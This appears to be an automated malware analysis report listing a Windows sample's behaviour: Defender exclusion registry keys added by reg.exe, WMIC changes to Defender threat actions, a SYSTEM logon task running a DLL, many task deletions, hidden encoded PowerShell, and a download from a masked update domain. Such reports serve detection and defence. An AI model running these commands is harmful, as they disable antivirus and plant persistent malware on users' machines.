Technical Information
- <SYSTEM32>\tasks\giobfndjm
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TjuNclevzQUn' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aQYEPcSYU' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\VCFsCINNSKfU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aQYEPcSYU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\VCFsCINNSKfU2' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TjuNclevzQUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TjuNclevzQUn' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\YyEFfdkdfSCAyCYpA' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\zbZJqMsxbdgnC' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\becFSQNUaGCELWVB' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aQYEPcSYU' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\TjuNclevzQUn' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\QPraEWTdXgUvhuIt' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\QPraEWTdXgUvhuIt' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\QPraEWTdXgUvhuIt' = '00000000'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%WINDIR%\Temp\QPraEWTdXgUvhuIt' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%TEMP%\YyEFfdkdfSCAyCYpA' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ALLUSERSPROFILE%\becFSQNUaGCELWVB' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\zbZJqMsxbdgnC' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\aQYEPcSYU' = '0'
- [<HKLM>\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\VCFsCINNSKfU2' = '0'
- [<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\VCFsCINNSKfU2' = '00000000'
- [<HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows Defender\Exclusions\Paths] '%ProgramFiles(x86)%\zbZJqMsxbdgnC' = '00000000'
- '%WINDIR%\temp\lhedorzobptzctjp\uqpvsw.exe' /S /UPDATE
- %WINDIR%\temp\lhedorzobptzctjp\uqpvsw.exe
- %WINDIR%\temp\qpraewtdxguvhuit\lyygzlwm\tvdgzjrsxserlzhx.wsf
- <SYSTEM32>\tasks\giobfndjm
- %WINDIR%\temp\qpraewtdxguvhuit\lyygzlwm\tvdgzjrsxserlzhx.wsf
- %ALLUSERSPROFILE%\ntuser.pol
- %HOMEPATH%\ntuser.pol
- http://www.te###pdate.info/updates/ya/ytab_own_1/win/update_e.jpg
- DNS ASK te###pdate.info
- '%WINDIR%\syswow64\wscript.exe' "%WINDIR%\Temp\QPraEWTdXgUvhuIt\lYyGZLwM\tvDgZjrsXserLZhx.wsf"
- '%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefau...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==' (with hidden window)
- '<SYSTEM32>\gpupdate.exe' /force' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C forfiles /p <SYSTEM32> /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefau...
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GDwEBUoUkZPScKL2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GDwEBUoUkZPScKL"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GDwEBUoUkZPScKL"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AbKHdNkDXcoHclG2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AbKHdNkDXcoHclG2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AbKHdNkDXcoHclG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AbKHdNkDXcoHclG"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CdgMUqbptHKeJHh2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GSmjKWjiVcUkYzd2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CdgMUqbptHKeJHh2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CdgMUqbptHKeJHh"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WuwojKAOybkAcZU2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WuwojKAOybkAcZU2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "WuwojKAOybkAcZU"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "WuwojKAOybkAcZU"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DRPGaAFcswhBjvX2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "DRPGaAFcswhBjvX2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "DRPGaAFcswhBjvX"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CdgMUqbptHKeJHh"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "DRPGaAFcswhBjvX"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GDwEBUoUkZPScKL2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "yOsntHMNFUfSkGv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "skdmaVrzZshbNv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "skdmaVrzZshbNv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "NSsZpJGcawFVVn"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "NSsZpJGcawFVVn"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "VevvFbeWxmWmTta2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "VevvFbeWxmWmTta2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "VevvFbeWxmWmTta"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "VevvFbeWxmWmTta"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FgKSGbwwqHWaOXI"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "FgKSGbwwqHWaOXI"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yOsntHMNFUfSkGv"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "yOsntHMNFUfSkGv"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gElsRtNKkMcutva2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gElsRtNKkMcutva2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gElsRtNKkMcutva"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gElsRtNKkMcutva"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FgKSGbwwqHWaOXI2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "FgKSGbwwqHWaOXI2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "yOsntHMNFUfSkGv2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rpzcNzbwDeYLIA"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rpzcNzbwDeYLIA"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GSmjKWjiVcUkYzd"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pzTmzAlslkKOCGfuZir2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rPrCrKVOgoAVtoF"
- '%WINDIR%\syswow64\schtasks.exe' /CREATE /TR "rundll32 \"%ProgramFiles(x86)%\aQYEPcSYU\sbgbgM.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "optCHZUBnDjXjgi" /V1 /F
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iEMOkcWzOaUegFVaeGP2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iEMOkcWzOaUegFVaeGP2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "iEMOkcWzOaUegFVaeGP"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "iEMOkcWzOaUegFVaeGP"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pzTmzAlslkKOCGfuZir2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rPrCrKVOgoAVtoF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rPrCrKVOgoAVtoF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "GSmjKWjiVcUkYzd"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JdLazDMmySvjWXoUKmW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JdLazDMmySvjWXoUKmW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "JdLazDMmySvjWXoUKmW"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "JdLazDMmySvjWXoUKmW"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zCzjMSzLpRYfihLTwJB2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zCzjMSzLpRYfihLTwJB2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zCzjMSzLpRYfihLTwJB"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pzTmzAlslkKOCGfuZir"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "GSmjKWjiVcUkYzd2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rPrCrKVOgoAVtoF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TdPPKjqWvwoESxw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TdPPKjqWvwoESxw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TPOiWRoCEWqdXIG2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TPOiWRoCEWqdXIG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TPOiWRoCEWqdXIG"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PPzklqZMdpBxbLb2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PPzklqZMdpBxbLb2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PPzklqZMdpBxbLb"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PPzklqZMdpBxbLb"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TPOiWRoCEWqdXIG2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AQdFIlbBsBnzNOw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AQdFIlbBsBnzNOw"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "TdPPKjqWvwoESxw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zKsIVUxNMjobaYq2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zKsIVUxNMjobaYq2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zKsIVUxNMjobaYq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zKsIVUxNMjobaYq"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "AQdFIlbBsBnzNOw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AQdFIlbBsBnzNOw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "TdPPKjqWvwoESxw"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AKJHOTxqHrqCbNnJZ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pZGLURqEkyviFO"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nJKrCgxsCoqLS2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cwqyenxSJHOCF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nJKrCgxsCoqLS"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nJKrCgxsCoqLS"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "XhFOKeTsGkbgr2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "XhFOKeTsGkbgr2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "XhFOKeTsGkbgr"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "XhFOKeTsGkbgr"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cwqyenxSJHOCF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pRILTZXprKTvO"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nJKrCgxsCoqLS2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "jsSzYiaflELaU"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ieSsqIzJICpBW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ieSsqIzJICpBW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ieSsqIzJICpBW"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ieSsqIzJICpBW"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jsSzYiaflELaU2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "jsSzYiaflELaU2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "jsSzYiaflELaU"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "cwqyenxSJHOCF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "cwqyenxSJHOCF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pRILTZXprKTvO2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "OckBbWwTfcgth2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "XHKlfyAEqeawW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "XHKlfyAEqeawW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "XHKlfyAEqeawW"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "XHKlfyAEqeawW"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gYIGrEMbWmGxe2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gYIGrEMbWmGxe2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "gYIGrEMbWmGxe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pRILTZXprKTvO"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "krPFpIHzfGkIf"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "gYIGrEMbWmGxe"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rIAdrpNzLOrOT"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rIAdrpNzLOrOT"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nVTduTJoucivN2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nVTduTJoucivN2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "nVTduTJoucivN"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "nVTduTJoucivN"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pRILTZXprKTvO2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rIAdrpNzLOrOT2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rIAdrpNzLOrOT2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "OckBbWwTfcgth2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "OckBbWwTfcgth"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "YyjqkahCzSXmso"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "arxNLgTLmBuJTQ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "arxNLgTLmBuJTQ"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "tCZNZgkFFvmamp"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "tCZNZgkFFvmamp"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "PZefWRCFkkrEjq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "PZefWRCFkkrEjq"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "tsfxfKKgDcnutH"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QXwDVwHPHnzwGi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "vDkHsPbHYgPFQF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "vDkHsPbHYgPFQF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "zgjqgBGbzFUpYR"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zgjqgBGbzFUpYR"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EIxgoZqvwfXalg"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EIxgoZqvwfXalg"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "KvANYurLHZpoCi"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "KvANYurLHZpoCi"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QXwDVwHPHnzwGi"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "tsfxfKKgDcnutH"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "QmNOtpMRncOjcP"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "YyjqkahCzSXmso"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "QmNOtpMRncOjcP"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EYMOUCXYsOZKf2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ahpKrDRviTvYt2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EYMOUCXYsOZKf2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "EYMOUCXYsOZKf"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "EYMOUCXYsOZKf"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dsYPtqcwByBMm2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "dsYPtqcwByBMm2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "dsYPtqcwByBMm"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "dsYPtqcwByBMm"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ahpKrDRviTvYt2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ahpKrDRviTvYt"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "OckBbWwTfcgth"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ahpKrDRviTvYt"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CRwBAEGPIdlJw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CRwBAEGPIdlJw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "CRwBAEGPIdlJw"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "CRwBAEGPIdlJw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "terJsgqvfSDPuG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "terJsgqvfSDPuG"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "zCzjMSzLpRYfihLTwJB"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pzTmzAlslkKOCGfuZir"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RtSooSmXXfhDvPTfVOG2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RtSooSmXXfhDvPTfVOG2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RtSooSmXXfhDvPTfVOG"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\becFSQNUaGCELWVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ucxlVuIooGBQWNuNE"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ZgrhmyaJfmhLmPgWZ2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ZgrhmyaJfmhLmPgWZ2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ZgrhmyaJfmhLmPgWZ"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ZgrhmyaJfmhLmPgWZ"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\YyEFfdkdfSCAyCYpA" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\YyEFfdkdfSCAyCYpA" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%TEMP%\YyEFfdkdfSCAyCYpA" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ucxlVuIooGBQWNuNE2"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TjuNclevzQUn" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\zbZJqMsxbdgnC" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\oxmCqSrXHHDWQupPXwR" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aQYEPcSYU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aQYEPcSYU" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\VCFsCINNSKfU2" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\VCFsCINNSKfU2" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\zbZJqMsxbdgnC" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ALLUSERSPROFILE%\becFSQNUaGCELWVB" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ucxlVuIooGBQWNuNE2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pekkAXwHWhdWaXJYw2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pekkAXwHWhdWaXJYw2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RKWdSyPVbkeXnQZQR2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RKWdSyPVbkeXnQZQR"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "RKWdSyPVbkeXnQZQR"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ANNfHOqEmftJASWHW2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ANNfHOqEmftJASWHW2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "ANNfHOqEmftJASWHW"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "ANNfHOqEmftJASWHW"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "RKWdSyPVbkeXnQZQR2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rKtrCgwJnszGfQfym"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rKtrCgwJnszGfQfym"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "pekkAXwHWhdWaXJYw"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FLDhiQLHWJYdYgrcF2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "FLDhiQLHWJYdYgrcF2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "FLDhiQLHWJYdYgrcF"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "FLDhiQLHWJYdYgrcF"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "rKtrCgwJnszGfQfym2"
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "rKtrCgwJnszGfQfym2"
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "pekkAXwHWhdWaXJYw"
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\TjuNclevzQUn" /t REG_DWORD /d 0 /reg:32
- '<SYSTEM32>\raserver.exe' /offerraupdate
- '%WINDIR%\syswow64\schtasks.exe' /END /TN "AKJHOTxqHrqCbNnJZ"
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
